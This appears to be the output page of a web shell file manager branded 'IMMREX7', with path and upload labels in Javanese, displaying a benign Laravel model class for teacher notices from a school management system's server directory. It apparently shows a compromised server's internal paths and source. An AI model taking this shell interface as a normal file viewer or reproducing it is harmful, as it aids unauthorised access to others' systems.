IMMREX7

aku nok ndi : /home/spdtg/www/schoolmis/app/
File Up :
aku nok ndi : /home/spdtg/www/schoolmis/app/TeacherNotice.php

<?php

namespace App\Models;

use Illuminate\Database\Eloquent\Factories\HasFactory;
use Illuminate\Database\Eloquent\Model;

class TeacherNotice extends Model
{
    use HasFactory;

    /**
     * The attributes that are mass assignable.
     *
     * @var array
     */
        protected $fillable = [
            'idEmployeeNoticeboard',
            'idFinancialYear',
            'idSchool',
            'idEmployee',
            'cardholder',
            'idDesignation',
            'idDepartment',
            'subject',
            'notice',
            'noticeFile',
            'publishDate',
            'isPublished',
            'created_at',
            'updated_at',
        ];
}

Copyright © 2021 - 2025 IMMREX7